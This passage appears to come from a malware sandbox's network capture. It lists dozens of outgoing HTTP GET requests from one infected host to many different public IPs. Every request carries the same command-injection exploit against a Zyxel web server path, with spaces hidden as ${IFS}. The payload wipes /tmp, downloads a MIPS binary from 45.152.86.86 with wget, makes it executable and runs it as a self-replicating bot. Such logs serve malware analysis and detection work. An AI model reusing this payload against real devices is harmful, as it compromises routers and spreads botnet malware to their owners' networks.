                                        Mar 31, 2024 09:22:24.654931068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7962192.168.2.2347188182.90.247.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.654999018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7963192.168.2.2345422182.90.182.228443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.655036926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7964192.168.2.2347448106.7.239.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.655111074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7965192.168.2.234396458.10.58.43443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.655179024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7966192.168.2.2348904105.251.164.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.655255079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7967192.168.2.233403288.113.170.47443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.655308962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7968192.168.2.2350018140.176.79.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.655384064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7969192.168.2.235283834.228.14.37443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.655431032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7970192.168.2.2349922222.111.13.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.655507088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7971192.168.2.2355924139.232.57.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.655572891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7972192.168.2.2346966135.209.54.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.655643940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7973192.168.2.233771013.180.216.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.655724049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7974192.168.2.234307682.167.211.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.655788898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7975192.168.2.23492085.167.11.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.655843019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7976192.168.2.2332858165.54.59.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.655905008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7977192.168.2.2357418171.178.132.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.655975103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7978192.168.2.2354534222.102.221.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.656038046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7979192.168.2.2344674193.94.60.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.656110048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7980192.168.2.233284467.182.173.157443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.656162024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7981192.168.2.2344138134.24.99.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.656213999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7982192.168.2.234538038.189.190.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.656302929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7983192.168.2.235975832.191.160.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.656344891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7984192.168.2.235891078.249.243.34443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.656425953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7985192.168.2.235489272.16.59.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.656483889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7986192.168.2.234370866.251.203.60443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.656538963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7987192.168.2.235015627.92.32.121443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.656589985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7988192.168.2.2351672165.14.153.76443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.656661034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7989192.168.2.235438289.67.208.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.656691074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7990192.168.2.2351312128.214.83.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.656759024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7991192.168.2.2340946223.85.174.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.656815052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7992192.168.2.233461052.206.150.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.656886101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7993192.168.2.2353040177.154.82.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.656961918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7994192.168.2.2339616161.143.194.86443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.657004118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7995192.168.2.233865819.184.0.195443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.657068968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7996192.168.2.2359484163.140.50.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.657123089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7997192.168.2.2341174187.213.13.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.657187939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7998192.168.2.234503069.13.68.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.657236099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7999192.168.2.2345554104.70.131.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.657310963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8000192.168.2.2353796180.234.83.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.657370090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8001192.168.2.2336424222.52.167.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.657447100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8002192.168.2.235743872.199.252.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.657495975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8003192.168.2.2336574222.221.222.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.657568932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8004192.168.2.2335236133.199.109.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.657598019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8005192.168.2.2358552143.30.156.239443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.657649994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8006192.168.2.2340440208.233.177.31443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.657707930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8007192.168.2.2340528134.37.200.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.657771111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8008192.168.2.2335126193.255.9.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.657841921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8009192.168.2.2359830134.56.163.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.657915115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8010192.168.2.234813427.152.99.106443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.657951117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8011192.168.2.233784843.83.99.89443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.658015966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8012192.168.2.2359908217.41.175.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.658114910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8013192.168.2.2343916177.194.77.106443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.658154964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8014192.168.2.233738297.151.152.179443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.658231974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8015192.168.2.235343457.210.1.230443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.658288002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8016192.168.2.2348278119.248.47.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.658370018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8017192.168.2.234243687.82.103.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.658435106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8018192.168.2.233940831.230.229.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.658508062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8019192.168.2.2333186221.113.25.245443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.658552885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8020192.168.2.2346802168.135.77.43443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.658628941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8021192.168.2.2358390135.77.156.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.658708096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8022192.168.2.2341582169.242.132.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.658766985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8023192.168.2.2344890159.209.246.159443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.658857107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8024192.168.2.234907453.204.150.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.658905029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8025192.168.2.234580237.239.227.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.658992052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8026192.168.2.2333650131.141.193.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.659044981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8027192.168.2.234322638.63.186.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.659116983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8028192.168.2.234105267.132.45.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.659178019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8029192.168.2.2344722162.39.51.147443
                                        TimestampBytes transferredDirectionData
